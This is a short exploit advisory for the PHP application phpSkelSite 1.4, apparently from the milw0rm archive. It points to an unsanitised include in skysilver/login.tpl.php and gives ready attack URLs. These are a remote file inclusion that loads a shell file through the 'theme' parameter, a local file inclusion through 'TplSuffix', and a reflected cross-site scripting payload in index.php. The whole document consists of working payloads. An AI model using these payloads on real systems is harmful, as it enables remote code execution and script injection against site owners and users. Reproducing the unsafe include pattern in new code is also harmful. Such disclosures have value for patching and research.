phpskelsite 1.4 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting



EKU-ID: 15492 CVE: OSVDB-51215;CVE-2009-0596;OSVDB-51214;CVE-2009-0595;OSVDB-51213;CVE-2009-0594 OSVDB-ID:
Author: ahmadbady Published: 2009-01-02 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


-----------------:RFI/LFI/xss:-----------------
-------------------------------------------
script:phpSkelSite

------------------------------------------------------------------
download from:http://apmuthu.tripod.com/files/phpSkelSite_v1.4.zip

------------------------------------------------------------------

........................................................
vul:/skysilver/login.tpl.php line 1

<? include $theme.'/pageheading'.$TplSuffix ; ?>


------------------------------------------------------
Rfi:

http://127.0.0.1/path/skysilver/login.tpl.php?theme=[shell.txt?]

Lfi:

http://127.0.0.1/path/skysilver/login.tpl.php?TplSuffix=[lfi]

***************************************************
xss:
http://127.0.0.1/path/index.php/>"><ScRiPt>alert('ahmadbady')</ScRiPt>
***************************************************
---------------------
Author: ahmadbady
---------------------

# milw0rm.com [2009-01-02]